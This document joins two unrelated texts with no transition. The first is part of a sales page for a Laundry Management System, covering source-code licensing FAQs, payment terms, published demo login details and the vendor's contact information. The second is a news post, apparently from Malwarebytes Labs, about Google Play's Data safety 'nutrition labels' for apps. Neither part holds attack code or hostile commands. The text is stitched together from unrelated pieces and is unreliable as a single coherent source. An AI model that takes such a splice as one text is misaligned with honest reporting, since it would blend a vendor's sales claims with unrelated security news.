*   Customized UI (Mobile, Website)         \[ as per your requirements\*\* \]
*   One Year Free Service & Updates.

Buy Now

\* Terms and Conditions apply (see FAQ section )  
\*\* Cost may vary depends on the customization

**Frequently Asked Questions**

Here are some of the most Frequently Asked Questions for Laundry Management Systems.

*   Can we get all liceses for lifetime ?
    
    Ans : Yes, if you purchase application with full source code then it's one-time payment and you will get multiple digital license \[lifetime\]. The amount is non-refundable , Once if you have got full source code then you will not getting return amount for any circumstances.
    
*   After purchase full source code can we sell this software ?
    
    Ans : Yes, after purchase application with full source code then you can use or sell anywhere with remove red planet computers company logo and name.
    
*   Can you will provide full source code ?
    
    Ans : Yes, you should have to pay 100% amount, if you want application with full source code. We will send full source code (zip or download link ) within half hours after successfully payment done. We will not provide any kind of equipment. Only RPL Business Package we will not provide source files.
    
*   What is **RPL Development / Customization Package** ?
    
    Ans : If you want manipulation or any changes in application through our professional developer team then you will have to pay selected (standard or professional) package amount plus extra 50% amount for manipulation charges. **Firstly, you have to pay 70% amount of total amount** and remaining 30% amount to pay after project completed, but note that in this period you will not getting full source code, you will getting our web hosting softwares link for testing, after completed project and 100% payment done then we will upload full source code in your website/web hosting server or send full source code link).  
    \- As per your requirement, project will be completed within 20-25 days or earlier.  
    \- Bulk SMS, Payment Gateway, Apple App Store, Google Map API & Play Store Console charges you will have to pay, if you are require.
    
*   Service and Support ?
    
    Ans : We will provide a FREE technical support upto one year after purchase LMS Application. We will answer your question regarding website management, technical details or anything about operating your own website; we can provide this through remotly in 24x7 Hours.
    

**Free Trail Full Version**

Not required fill any personal information or credit card details just click on button and login it

Username : admin  
Password : 1234  
\[ Admin Login Details \]

  
Best view in Desktop or Laptop

Mobile : 8767228990  
Password : 1983  
\[ Demo User Login Details \]

  
Best view in Desktop or Laptop

User Mobile : 8767228990  
Driver Mobile : 1234567890  
\[ Demo User / Driver Login Details \]

   
iOS app install : Download and Extract zip in Mac-OS then drag-drop .app file on Xcode 10+ simulator or connected iphone {iOS v10.0+}.

**Contact**

You can call to us 24x7 regarding Laundry Management System enquiry or solutions

**Location:**

B-02, Sai Sanklap Complex, Survey No. 145/0,  
Usarli Khurd, Panvel, Mumbai, India 410206

**Call:**

Mobile : +91 87672 28990.  
Whatsapp : +91 87672 28990.  
Skype : rpcits2013 / +918767228990.

Google has been busy. After introducing badges for browser apps, it's also launched its "nutrition labels" for apps.
The post Google Play’s Data safety section empowers Android users to make informed app choices appeared first on Malwarebytes Labs.

Google has launched its new “nutrition labels” for apps, a feature it promised in the spring of 2021. This release came days after the Chrome team released badges for the Chrome Web Store for browser extensions.

The company said in a blog post that it’s rolling out the labels—which it calls the Google Play Data safety section—gradually to users.

The labels are released weeks ahead of the July 20 deadline, the date when developers are required to adequately disclose what their apps do. This includes what data they collect, how it is shared with third parties (if ever), and how they secure user data. “We heard from users and app developers that displaying the data an app collects, without additional context, is not enough,” Google said.

Indeed, the search giant followed Apple’s lead when it introduced app privacy labels in its App Store in December 2020.

The Data safety section’s design relied heavily on feedback from Android users, who also want to know for what purpose their data is collected and whether app developers are sharing it. Google added information on whether an app needs data to function or if data collection is optional. Below is a list of other information that developers can show in the Data safety section of their apps:

> – Whether a qualifying app has committed to following Google Play’s Families Policy to better protect children in the Play store.  
> – Whether the developer has validated their security practices against a global security standard (more specifically, the MASVS).

While this new feature is in place so Android users can make informed choices when it comes to trusting an app with their data, it’s still up to developers to disclose what their apps are capable of. Google said that if it finds a developer misstating their app’s features, the company will ask them to fix it instead of removing the app straight away. Action is only taken if the app remains uncompliant.

We will see if Google does a better job implementing its labels than Apple. If you recall, many labels in the App Store were found to be unreliable as they provided false information.

Here is the Google Play Help page for the Data safety section if you want to read more.

Tag

#apple